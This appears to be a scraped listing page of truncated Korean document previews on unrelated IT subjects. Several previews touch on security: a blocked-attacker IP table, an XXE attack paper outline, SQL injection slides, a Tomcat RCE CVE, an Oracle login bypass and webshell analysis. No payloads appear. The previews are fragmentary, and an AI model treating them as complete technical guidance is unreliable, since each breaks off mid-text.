SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft PowerPoint - chap01-C언어개요.pptx #include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을

More information

ìœ€íŁ´IP( _0219).xlsx

ìœ€íŁ´IP( _0219).xlsx 차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

[Brochure] KOR_TunA

[Brochure] KOR_TunA LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

View Licenses and Services (customer)

View Licenses and Services (customer) 빠른 빠른 시작: 시작: 라이선스, 라이선스, 서비스 서비스 및 주문 주문 이력 이력 보기 보기 고객 가이드 Microsoft 비즈니스 센터의 라이선스, 서비스 및 혜택 섹션을 통해 라이선스, 온라인 서비스, 구매 기록 (주문 기록)을 볼 수 있습니다. 시작하려면, 비즈니스 센터에 로그인하여 상단 메뉴에서 재고를 선택한 후 내 재고 관리를 선택하십시오. 목차

More information

Visual Studio online Limited preview 간략하게살펴보기

Visual Studio online Limited preview 간략하게살펴보기 11월의주제 Visual Studio 2013 제대로파헤쳐보기! Visual Studio online Limited preview 간략하게살펴보기 ALM, 언제어디서나 연결된 IDE Theme와 Visual Design 편집기의강화된생산성기능들성능최적화및디버깅개선 Microsoft 계정으로 IDE에서로그인가능다양한머신사이에서개발환경유지다양한디바이스에걸쳐설정을동기화개선된

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

PowerPoint Presentation

PowerPoint Presentation 오에스아이소프트코리아세미나세미나 2012 Copyright Copyright 2012 OSIsoft, 2012 OSIsoft, LLC. LLC. PI Coresight and Mobility Presented by Daniel Kim REGIONAL 세미나 SEMINAR 세미나 2012 2012 2 Copyright Copyright 2012 OSIsoft,

More information

Microsoft PowerPoint 웹 연동 기술.pptx

Microsoft PowerPoint 웹 연동 기술.pptx 웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우

More information

5th-KOR-SANGFOR NGAF(CC)

5th-KOR-SANGFOR NGAF(CC) NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는

More information

vRealize Automation용 VMware Remote Console - VMware

vRealize Automation용 VMware Remote Console - VMware vrealize Automation 용 VMware Remote Console VMware Remote Console 9.0 이문서는새버전으로교체되기전까지나열된각제품버전및모든이후버전을지원합니다. 이문서에대한최신버전을확인하려면 http://www.vmware.com/kr/support/pubs 를참조하십시오. KO-002230-00 vrealize Automation

More information

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

Microsoft PowerPoint - e pptx

Microsoft PowerPoint - e pptx Import/Export Data Using VBA Objectives Referencing Excel Cells in VBA Importing Data from Excel to VBA Using VBA to Modify Contents of Cells 새서브프로시저작성하기 프로시저실행하고결과확인하기 VBA 코드이해하기 Referencing Excel Cells

More information

Studuino소프트웨어 설치

Studuino소프트웨어 설치 Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...

More information

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다. PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.

More information

MySQL-.. 1

MySQL-.. 1 MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

untitled

untitled 웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는

More information

Endpoint Protector - Active Directory Deployment Guide

Endpoint Protector - Active Directory Deployment Guide Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기

소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기 소규모 비즈니스를 위한 YouTube 플레이북 YouTube에서 호소력 있는 동영상으로 고객과 소통하기 소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기

More information

TTA Journal No.157_서체변경.indd

TTA Journal No.157_서체변경.indd 표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH

More information

문서 템플릿

문서 템플릿 HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,

More information

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터 운영체제실습 Raspbian 설치 2017. 3 표월성 wspyo74@naver.com cherub.sungkyul.ac.kr 목차 Ⅰ. 설치 1. 라즈비안 (Raspbian 설치 ) 2. 설치후, 설정 설정사항 Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로

More information

PDF_Compass_32호-v3.pdf

PDF_Compass_32호-v3.pdf Design Compass는 특허청의 디자인맵 웹사이트에서 제공하는 디자인, 브랜드, 기술, 지식재산권에 관한 다양한 콘텐츠를 디자이너들의 입맛에 맞게 엮은 격월간 디자인 지식재산권 웹진입니다. * Design Compass는 저작이용이 허락된 서울서체(서울시)와 나눔글꼴(NHN)을 사용하여 제작되었습니다. 2 4 5 6 7 9 10 11 편집 / 디자인맵

More information

슬라이드 제목 없음

슬라이드 제목 없음 MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS 로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS 보다가격이매우저렴한편이고,

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

Cloud Friendly System Architecture

Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

IRISCard Anywhere 5

IRISCard Anywhere 5 이 빠른 사용자 가이드는 IRISCard Anywhere 5 및 IRISCard Corporate 5 스캐너의 설치와 시작을 도와 드립니다. 이 스캐너와 함께 제공되는 소프트웨어는: - Cardiris Pro 5 및 Cardiris Corporate 5 for CRM (Windows 용) - Cardiris Pro 4 (Mac OS 용) Cardiris 의

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Microsoft Word - [2017SMA][T8]OOPT_Stage_2040 ver2.docx

Microsoft Word - [2017SMA][T8]OOPT_Stage_2040 ver2.docx OOPT Stage 2040 - Design Feesual CPT Tool Project Team T8 Date 2017-05-24 T8 Team Information 201211347 박성근 201211376 임제현 201411270 김태홍 2017 Team 8 1 Table of Contents 1. Activity 2041. Design Real Use

More information

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx #include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO Windows 7 설치및 PCIE RAID 설정정보 DK173 초판 11월 2016 A. Windows 7 및 USB 드라이버설치 칩셋사양에따라 Windows 7 설치중에 USB 키보드 / 마우스를사용하려면시스템에서 USB 드라이버를사전로드해야합니다. 이절에서는 USB 드라이버사전로드방법과 Windows 7 설치방법에대해서설명합니다. 방법 1: SATA ODD

More information

Windows Live Hotmail Custom Domains Korea

Windows Live Hotmail Custom Domains Korea 매쉬업코리아2008 컨퍼런스 Microsoft Windows Live Service Open API 한국 마이크로소프트 개발자 플랫폼 사업 본부 / 차세대 웹 팀 김대우 (http://www.uxkorea.net 준서아빠 블로그) Agenda Microsoft의 매쉬업코리아2008 특전 Windows Live Service 소개 Windows Live Service

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

경우 1) 80GB( 원본 ) => 2TB( 복사본 ), 원본 80GB 는 MBR 로디스크초기화하고 NTFS 로포맷한경우 복사본 HDD 도 MBR 로디스크초기화되고 80GB 만큼포맷되고나머지영역 (80GB~ 나머지부분 ) 은할당되지않음 으로나온다. A. Window P

경우 1) 80GB( 원본 ) => 2TB( 복사본 ), 원본 80GB 는 MBR 로디스크초기화하고 NTFS 로포맷한경우 복사본 HDD 도 MBR 로디스크초기화되고 80GB 만큼포맷되고나머지영역 (80GB~ 나머지부분 ) 은할당되지않음 으로나온다. A. Window P Duplicator 는기본적으로원본하드디스크를빠르게복사본하드디스크에복사하는기능을하는것입니다.. 복사본 하드디스크가원본하드디스크와똑같게하는것을목적으로하는것이어서저용량에서고용량으로복사시몇 가지문제점이발생할수있습니다. 하드디스크는사용하려면, 디스크초기화를한후에포맷을해야사용가능합니다. Windows PC는 MBR과 GPT 2 개중에 1개로초기화합니다. -Windows

More information

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA Spotlight on Oracle V10.x DELL SOFTWARE KOREA 2016-11-15 Spotlight on Oracle 목차 1. 시스템요구사항... 2 1.1 지원하는데이터베이스...2 1.2 사용자설치홖경...2 2. 프로그램설치... 3 2.1 설치프로그램실행...3 2.2 라이선스사용관련내용확인및사용동의...3 2.3 프로그램설치경로지정...4

More information

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D> VHDL 프로그래밍 D. 논리합성및 Xilinx ISE 툴사용법 학습목표 Xilinx ISE Tool 을이용하여 Xilinx 사에서지원하는해당 FPGA Board 에맞는논리합성과정을숙지 논리합성이가능한코드와그렇지않은코드를구분 Xilinx Block Memory Generator를이용한 RAM/ ROM 생성하는과정을숙지 2/31 Content Xilinx ISE

More information

Microsoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와 디바이스에 관계 없이 언제, 어디서나 문서를 확인하고 편집

Microsoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와 디바이스에 관계 없이 언제, 어디서나 문서를 확인하고 편집 Modern Modern www.office.com ( ) 892 5 : 1577-9700 : http://www.microsoft.com/korea Microsoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와

More information

윈도우시스템프로그래밍

윈도우시스템프로그래밍 데이터베이스및설계 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2012.05.10. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

자연언어처리

자연언어처리 제 7 장파싱 파싱의개요 파싱 (Parsing) 입력문장의구조를분석하는과정 문법 (grammar) 언어에서허용되는문장의구조를정의하는체계 파싱기법 (parsing techniques) 문장의구조를문법에따라분석하는과정 차트파싱 (Chart Parsing) 2 문장의구조와트리 문장 : John ate the apple. Tree Representation List

More information

1

1 1 2 3 4 5 6 b b t P A S M T U s 7 m P P 8 t P A S M T U s 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Chapter 1 29 1 2 3 4 18 17 16 15 5 6 7 8 9 14 13 12 11 10 1 2 3 4 5 9 10 11 12 13 14 15

More information

금오공대 컴퓨터공학전공 강의자료

금오공대 컴퓨터공학전공 강의자료 C 프로그래밍프로젝트 Chap 14. 포인터와함수에대한이해 2013.10.09. 오병우 컴퓨터공학과 14-1 함수의인자로배열전달 기본적인인자의전달방식 값의복사에의한전달 val 10 a 10 11 Department of Computer Engineering 2 14-1 함수의인자로배열전달 배열의함수인자전달방식 배열이름 ( 배열주소, 포인터 ) 에의한전달 #include

More information

문서의 제목 나눔고딕B, 54pt

문서의 제목 나눔고딕B, 54pt 산업공학과를위한 프로그래밍입문 (w/ 파이썬 ) PART II : Python 활용 가천대학교 산업경영공학과 최성철교수 간단한파일다루기 [ 생각해보기 ] 우리는어떻게프로그램을시작하나? 보통은이렇게생긴아이콘을누른다! 그러나실제로는아이콘이아닌 실행파일 을실행시키는것아이콘을클릭하고오른쪽마우스클릭 속성 을선택해볼것 [ 생각해보기 ] 옆과같은화면이나올것이다대상에있는

More information

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN

More information

Microsoft Word - ijungbo1_13_02

Microsoft Word - ijungbo1_13_02 [ 인터넷정보관리사필기 ] 기출문제 (11) 1 1. 지금부터인터넷정보관리사필기기출문제 (11) 를풀어보겠습니다. 2. 홈페이지제작할때유의할점으로가장거리가먼것은무엇일까요? 3. 정답은 ( 라 ) 입니다. 홈페이지제작시유의할점으로는로딩속도를고려하며, 사용자중심의인터페이스로제작하고, 이미지의크기는적당하게조절하여야한다. [ 인터넷정보관리사필기 ] 기출문제 (11)

More information

슬라이드 1

슬라이드 1 4. Mobile Service Technology Mobile Computing Lecture 2012. 10. 5 안병익 (biahn99@gmail.com) 강의블로그 : Mobilecom.tistory.com 2 Mobile Service in Korea 3 Mobile Service Mobility 4 Mobile Service in Korea 5 Mobile

More information

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 학습내용 1. Java Development Kit(JDK) 2. Java API 3. 자바프로그래밍개발도구 (Eclipse) 4. 자바프로그래밍기초 2 자바를사용하려면무엇이필요한가? 자바프로그래밍개발도구 JDK (Java Development Kit) 다운로드위치 : http://www.oracle.com/technetwork/java/javas

More information

